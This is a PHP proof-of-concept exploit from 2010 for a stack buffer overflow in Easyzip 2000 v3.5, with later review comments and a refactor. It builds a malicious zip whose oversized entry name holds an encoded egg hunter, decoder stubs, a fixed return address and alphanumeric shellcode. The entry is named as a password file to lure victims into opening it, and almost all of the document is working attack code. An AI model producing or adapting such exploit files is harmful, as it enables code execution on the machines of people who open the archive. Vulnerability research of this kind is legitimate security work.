# Title : Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
# Published : 2010-04-25
# Author : mr_me
<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://www.thefreesite.com/ezip35.exe
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-032
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Constraints: the overwritten region only tolerates lowercase ASCII and leaves less than 400 bytes of payload space, yet code execution is still achieved (hence the encoded egg hunter that locates the real shellcode elsewhere in the name).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
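// ---------------------------------------------------------------------------
// NOTE(review): the listing as archived had lost the backslash of every "\xNN"
// escape ("x50x4B..."), so it emitted the ASCII text "x50x4B..." instead of
// the intended bytes and never produced a zip at all.  Escapes are restored
// below, and the container's length/offset fields are now derived from the
// payload instead of being hard-coded (0x0fe4 / 0x1012 / 0x1002), so editing
// the payload can no longer silently desynchronise the headers.
// ---------------------------------------------------------------------------

/**
 * Right-pad $chunk with $filler up to exactly $length bytes.
 *
 * @throws LengthException if $chunk is already longer than $length (the
 *         original used a bare str_repeat() with a negative count here).
 */
function pad_to(string $chunk, int $length, string $filler = 'a'): string
{
    $have = strlen($chunk);
    if ($have > $length) {
        throw new LengthException("chunk is {$have} bytes, limit is {$length}");
    }
    return $chunk . str_repeat($filler, $length - $have);
}

/**
 * Wrap one stored (method 0), zero-length entry named $entryName in a minimal
 * PKZIP container: local file header, the name, central directory header, the
 * name again, end-of-central-directory record.
 *
 * All fields are little-endian.  The constants reproduce the original PoC
 * byte-for-byte: version 2.0 (0x0014), no flags, DOS time/date 0xACB7/0x34CE,
 * CRC and sizes 0, internal attribute 1, external attribute 0x24.  Only the
 * (oversized) name length is what the target trips over.
 *
 * @throws LengthException if the name does not fit the 16-bit length field.
 */
function zip_wrap(string $entryName): string
{
    $nameLen = strlen($entryName);
    if ($nameLen > 0xFFFF) {
        throw new LengthException("entry name is {$nameLen} bytes, zip allows at most 65535");
    }

    // Local file header (30 bytes): signature, version needed, flags, method,
    // mod time, mod date, crc32, compressed size, uncompressed size,
    // name length, extra-field length.
    $local = pack(
        'a4vvvvvVVVvv',
        "PK\x03\x04", 0x0014, 0, 0, 0xACB7, 0x34CE, 0, 0, 0, $nameLen, 0,
    );

    // Central directory header (46 bytes): as above plus version made by,
    // comment length, disk number, internal/external attributes and the
    // offset of the local header (0 — it is the first thing in the file).
    $central = pack(
        'a4vvvvvvVVVvvvvvVV',
        "PK\x01\x02", 0x0014, 0x0014, 0, 0, 0xACB7, 0x34CE, 0, 0, 0,
        $nameLen, 0, 0, 0, 1, 0x24, 0,
    );

    // End of central directory (22 bytes): one entry on one disk; CD size and
    // CD offset follow from the fixed header sizes and the name length.
    $end = pack(
        'a4vvvvVVv',
        "PK\x05\x06", 0, 0, 1, 1,
        strlen($central) + $nameLen,
        strlen($local) + $nameLen,
        0,
    );

    return $local . $entryName . $central . $entryName . $end;
}

/**
 * Build the complete cst-easyzip.zip PoC (8234 bytes) as a string.
 *
 * The single entry's name is 4068 bytes long; this is the overflow trigger
 * named in the title.  Layout of the name (offsets in bytes, padding is 'a'):
 *     0  "mr_mes_secrect_passwords.txt" (28) + 249 bytes of padding
 *   277  egg hunter, encoded to lowercase ASCII, padded to 144 bytes
 *   421  pushad/pop stub, decoder stage 1, align, decoder stage 2, align
 *   496  "\x98\x8e\x89\xf1\x64\x64" then "\x16\x32\x40\x00"
 *   506  padding up to offset 2000
 *  2000  "W00TW00T" egg tag (8)
 *  2008  MessageBox shellcode, padded to 2056 bytes
 *  4064  ".txt"
 *
 * The opcode bytes and the dword at offset 502 are carried over unchanged from
 * the original PoC; their meaning is not re-verified here (the \x25/\x2d stubs
 * look like an AND/SUB-style alphanumeric decoder, and 0x00403216 presumably
 * is an address inside the non-ASLR image on the stated XP SP3 target).
 */
function build_easyzip_poc(): string
{
    // Entry name that the victim sees first; the rest of the 4068 bytes is
    // the overflow and payload.
    $name = 'mr_mes_secrect_passwords.txt';

    // Corelan Security Team MessageBox shellcode (alphanumeric, 263 bytes).
    $shellcode = 'VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2'
        . 'M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W'
        . '343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4'
        . 'JJL15612J1267KM2K4D903K03';

    // Egg hunter encoded to lowercase ASCII (123 bytes); it must fit in the
    // 144-byte slot below, hence pad_to() rather than a fixed repeat count.
    $eggHunter = 'j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5'
        . '225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927';

    $decoderStage1 = "\x25\x4a\x4d\x4e\x55\x25\x35\x08\x31\x2a"
        . "\x2d\x49\x49\x49\x5e\x2d\x4a\x49\x4a\x5e\x2d\xc1\xc1\xc1\x5f";
    $decoderStage2 = "\x25\x4A\x4d\x4e\x55\x25\x10\x10\x31\x10"
        . "\x2d\x2a\x69\x37\xc1\x2d\x2a\x69\x36\xc1\x2d\x2b\x6a\xb1\x9b";

    // 8-byte alignment stub placed after each decoder stage.
    $align = "\x60" . str_repeat("\x5d", 7);

    // First 2000 bytes: name, padding, egg hunter and decoder stubs.
    $stage = $name
        . str_repeat('a', 249)
        . pad_to($eggHunter, 144)
        . "\x60" . str_repeat("\x5b", 8)
        . $decoderStage1 . $align
        . $decoderStage2 . $align
        . "\x98\x8e\x89\xf1\x64\x64"
        . "\x16\x32\x40\x00";

    // Then the doubled egg tag the hunter searches for, the real shellcode,
    // and a ".txt" suffix closing the name (4068 bytes in total).
    $entryName = pad_to($stage, 2000)
        . 'W00TW00T'
        . pad_to($shellcode, 2056)
        . '.txt';

    return zip_wrap($entryName);
}

// Write the PoC to the working directory.  Handle the result only in an
// isolated lab: opening it in the vulnerable EasyZip build executes the
// embedded shellcode.
$_____b00m = build_easyzip_poc();
$outFile = 'cst-easyzip.zip';
if (file_put_contents($outFile, $_____b00m) !== strlen($_____b00m)) {
    throw new RuntimeException("could not write {$outFile}");
}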